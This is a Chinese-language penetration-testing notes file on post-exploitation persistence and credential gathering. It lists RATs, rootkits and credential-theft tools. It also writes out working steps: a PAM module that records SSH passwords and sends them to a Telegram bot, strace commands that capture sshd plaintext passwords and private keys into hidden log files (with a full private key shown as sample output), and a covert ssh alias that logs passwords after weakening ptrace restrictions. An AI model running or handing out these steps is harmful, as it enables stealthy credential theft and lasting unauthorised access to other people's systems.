sec_RAT_post_exploitation.md

后渗透 - 权限维持

• Persistence - MITRE ATT&CK™
  • 通用
    • 白利用 - 利用系统或普通程序的白文件进行权限维持
    • Web Shell - web服务开启即可进行权限维持
    • 系统账号 - (合法功能 无任何恶意代码)信息搜集、窃取等方式得到登录凭据
    • 远程服务 - (合法功能 无任何恶意代码)允许用户从外部位置连接到企业内部网络资源 如VPN等
  • Windows
    • 创建帐号 - (合法功能 无任何恶意代码)具有足够访问级别的攻击者可以创建本地系统或域帐户
    • 注册表 - 如更改默认文件关联、创建新服务、修改现有服务...
    • DLL Hijacking - DLL劫持
    • 辅助功能 - 利用windows登录街面的的辅助功能
    • bootkit - 修改硬盘驱动器的引导扇区 包括主引导 (MBR) 卷引导记录(VBR)
    • Startup文件夹 - 放入文件夹则自启动C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
    • Office应用程序的启动 - 启动基于Office的应用程序时可以使用多种机制进行维持
    • 快捷方式修改 - 创建一个新的快捷方式、修改已有快捷方式的指向
    • WMI事件订阅 - 攻击者可以使用WMI的功能来订阅事件并在事件发生时执行任意代码
    • ...
  • linux

    • 创建帐号 - (合法功能 无任何恶意代码)

    • rootkit - 如利用LKM加载到linux内核

    • Systemd Service - systemd服务管理器通常用于管理后台守护进程(background daemon processes,也叫做services)和其他系统资源

    • Port Knocking - 发送约定好的数据包到某正常端口 使后门程序使用iptables等程序打开其他端口

    • .bash_profile 和 .bashrc - ~/.bash_profile和~/.bashrc在打开新shell或用户登录时在用户上下文中执行,以便正确设置其环境.~/.bash_profile针对登录shell执行 ~/.bashrc针对交互式非登录shell执行.

    • ...

  • macOS
    • 修改plist文件 - Property list (plist)文件包含macOS用于配置应用程序和服务的所有信息
    • Dylib劫持 - (类似Windows的DLL劫持) macOS查找所需的动态库(dylib) 如果某程序指定了不明确的路径且未使用"库验证"机制 容易被攻击者利用
    • ...

权限维持相关项目

名称	属性	针对目标	描述
gentilkiwi/mimikatz	C	Windows	7k★ 从内存中提取plaintexts passwords/hash/PIN code/kerberos tickets
PowerShellMafia/PowerSploit	PowerShell	Windows	5k★ 综合类 A PowerShell Post-Exploitation Framework.代码执行 权限维持 AVbypass 提升权限 信息搜集
samratashok/nishang	PowerShell	Windows	3k★ 综合类 渗透测试全阶段都有用
secabstraction/PowerCat	PowerShell	Windows	类似netcat的TCP/IP瑞士军刀 功能:File Transfer、Shells、UDP and SMB、SSL、Relays、Generate Payloads、Misc
bitsadmin/nopowershell	C#	windows	用C#重新构建的PowerShell.任何PowerShell日志记录机制都无法记录. 在Cobalt Strike中复制NoPowerShell.exe和NoPowerShell.cna到Cobalt Strike的scripts文件夹 可实现从内存执行命令. 还可以通过rundll32运行
zerosum0x0/koadic	python	Windows	1k★ Koadic C3 COM Command & Control - JScript RAT
n1nj4sec/pupy	python2	Windows/linux	4k★ #RAT Pupy is a cross-platform remote administration and post-exploitation tool
EggShell	python	macOS/Linux	#RAT iOS(Jailbroken)/macOS/Linux(OnlyFileManage)
Ne0nd0g/merlin	golang	all	2k★ #RAT [BlackHat tools] a cross-platform post-exploitation [HTTP/2] Command & Control server and agent
tiagorlampert/CHAOS	golang	all	1k★ #RAT cross-platform keylogger
rek7/fireELF	python	linux	#Fileless 不落地 从内存中完全运行linux elf可执行文件原理参考
fbkcs/ThunderDNS	python3/PowerShell/bash	linux/Win	#backdoor 通过DNS协议转发TCP流量(forward TCP traffic over DNS protocol) 支持socks5
dnscat2	C++ C Ruby	linux Win32	#backdoor #DNS
backdoors	sh	linux	#backdoor 利用SSH日志触发的后门分析
outflanknl/EvilClippy	C#	Windows	生成含shellcode的office文件. A cross-platform assistant for creating malicious MS Office documents. Can hide VBA macros, stomp VBA code (via P-Code) and confuse macro analysis tools. Runs on Linux, OSX and Windows.

后渗透 - 白利用

• 白利用 系统自带程序/普通应用程序
  • DLL Hijacking
  • ...

名称	针对目标	描述
UltimateAppLockerByPassList	windows	绕过AppLocker即“应用程序控制策略” 的最常用技术
LOLBAS	windows	攻击者滥用windows自带的Binaries Scripts Libraries 进行后渗透：权限维持、文件传输.. 项目地址
GTFOBins	linux	攻击者滥用linux自带二进制文件的合法功能 绕过本地安全限制 进行后渗透操作

后渗透 - linux下利用pam_get_item函数记录ssh密码并发送(https)

The pam_get_item function allows applications and PAM service modules to access and retrieve PAM informations of item_type.

https://github.com/mthbernardes/sshLooterC

可在自己主机上编译完成,再复制到victim主机.

Dependencies:
gcc
libcurl4-openssl-dev
ibpam0g-dev

Configure:
Edit the `looter.c` and add your telegram bot token and your user id.

Compiling:
make

Usage:
Copy the `looter.so` to the infected machine on `/lib/security`, then edit the `/etc/pam.d/common-auth` and add the following lines.

auth optional module.so
account optional module.so

后渗透 - 获取sshd的信息(其他人登录本机的凭证)

• 参考
  • https://xz.aliyun.com/t/7698
  • https://github.com/blendin/3snake

获取sshd进程明文密码

1.root权限执行
# 使用括号执行程序，当前shell退出，执行的程序不会退出
(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)

2.查找用户名和密码的正则表达式为read\(6, ".+\\0\\0\\0\\.+"
# 查找用户名和口令
grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/.sshd.log

# 结果形式如下
[pid  2401] 22:34:34 read(6, "\10\0\0\0\4root", 9) = 9
[pid  2401] 22:34:34 read(6, "\4\0\0\0\16ssh-connection\0\0\0\0\0\0\0\0", 27) = 27
[pid  2401] 22:34:34 read(6, "\f\0\0\0\4toor", 9) = 9

获取sshd进程私钥

1.root权限执行

# 使用括号执行程序，当前shell退出，执行的程序不会退出
(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 4096 2> /tmp/.sshd.log &)
2.查找私钥直接搜索字符串PRIVATE KEY


# 查找用户名和密码 (如果私钥设置的了密码 似乎不能抓到私钥密码)
grep 'PRIVATE KEY' /tmp/.sshd.log

# 结果形式如下
[pid  1009] 23:17:34 read(4, "-----BEGIN OPENSSH PRIVATE KEY-----\n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\npuzYc7LCnLR8alqQAAAAlyb290QGthbGk=\n-----END OPENSSH PRIVATE KEY-----\n", 4096) = 2590

后渗透 - linux下用strace记录从本机ssh客户端登录的密码

ubuntu测试成功

利用前提:默认普通用户权限即可

参考 https://www.kernel.org/doc/Documentation/security/Yama.txt

The sysctl settings (writable only with CAP_SYS_PTRACE) are:

0 - classic ptrace permissions: a process can PTRACE_ATTACH to any other
    process running under the same uid, as long as it is dumpable (i.e.
    did not transition uids, start privileged, or have called
    prctl(PR_SET_DUMPABLE...) already). Similarly, PTRACE_TRACEME is
    unchanged.

1 - restricted ptrace: a process must have a predefined relationship
    with the inferior it wants to call PTRACE_ATTACH on. By default,
    this relationship is that of only its descendants when the above
    classic criteria is also met. To change the relationship, an
    inferior can call prctl(PR_SET_PTRACER, debugger, ...) to declare
    an allowed debugger PID to call PTRACE_ATTACH on the inferior.
    Using PTRACE_TRACEME is unchanged.

2 - admin-only attach: only processes with CAP_SYS_PTRACE may use ptrace
    with PTRACE_ATTACH, or through children calling PTRACE_TRACEME.

3 - no attach: no processes may use ptrace with PTRACE_ATTACH nor via
    PTRACE_TRACEME. Once set, this sysctl value cannot be changed.

The original children-only logic was based on the restrictions in grsecurity.

# 查看当前配置(如果值为3 修改该值后需重启系统生效)
cat /proc/sys/kernel/yama/ptrace_scope

# 修改配置
echo 0 > /proc/sys/kernel/yama/ptrace_scope
# 或
sysctl kernel.yama.ptrace_scope=0

# 编辑命令别名
vi ~/.bashrc
# 或
vi /etc/bashrc

# 添加一条命令别名
alias ssh='strace -o /tmp/.sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s 2048 ssh'

# 使命令别名立即生效
source ~/.bashrc

# 查看正确的密码
grep "read(5" /tmp/.sshpwd-21Sep091537518282.log | tail -n 11

# 查看其他的输入
grep "read(*" /tmp/.sshpwd-21Sep091537518282.log | tail -n 11

后渗透 - linux rootkit

名称	属性	针对目标	描述
rootkit m0nad/Diamorphine	C	Linux Kernels 2.6.x/3.x/4.x (x86 x86_64)	#backdoor #LKM #rootkit 需要ROOT权限 隐藏指定进程与通信.
rootkit f0rb1dd3n/Reptile	C	linux	#backdoor #LKM #rootkit 参考Diamorphine开发. 以下系统下运行测试通过Debian 9/Ubuntu 18.04.1/Centos 7

后渗透 - 信息搜集

• 搜集的点
  • 系统 - 账号 口令
  • 浏览器 - 账号 口令
  • 邮箱客户端 - Outlook Thunderbird等
  • IM客户端 - Skype等
  • 数据库客户端 - DBVisualizer Postgresql Robomongo Squirrel SQLdevelopper等
  • RDP - 远程桌面连接程序 所保存的登录信息 ip 用户名 口令
  • 开发者常用软件 - Git for Windows、(SVN)Tortoise、Maven Apache等
  • 管理员常用软件 - Apache Directory Studio、CoreFTP、CyberDuck、FileZilla、FTPNavigator、OpenSSH、OpenVPN、PuttyCM、RDPManager、VNC、WinSCP、Windows Subsystem for Linux等
  • WIFI密码 - Wireless Network等
  • 代码与配置文件 - 从代码中找到有用的 ip port user pass mail token ... 可考虑对系统进行代码审计
  • 个人文件 - .txt .doc .xls 等
  • ...

名称	属性	针对目标	描述
LaZagne	python	windows/Linux/macOS	#凭证恢复(Credentials recovery):系统口令/浏览器/邮箱/wifi... lazagne.exe会被查杀. 获取所有凭证约耗时3分钟.
djhohnstein/SharpWeb	C# .exe	Windows	#浏览器凭证获取 .NET 2.0 CLR project. Retrieve All Saved Browser Credentials.
GhostPack/Seatbelt	C#	Windows	搜集主机上安全相关的信息. AntiVirus/AMSIProviders/... 以及系统信息

BypassUAC

UAC (User Account Control) is a security feature, introduced from Windows 7 and onward versions of Windows. This prevents that even a local administrator account can’t execute changes to operating system, unless the user specifically chooses to. It is very common to see desktop users working with Administrators account (not recommended, but common), so even if a Malware, using a compromised Local Administrator account, tries to change something in the registry, or create a new service in the system, UAC won’t let that happen.

• 参考项目

  • GitHub - hfiref0x/UACME: Defeating Windows User Account Control

• 参考资料

  • Technique: Bypass User Account Control - MITRE ATT&CK™
  • How to bypass UAC in newer Windows versions | zc00l blog

其他文章

Ping Power - ICMP隧道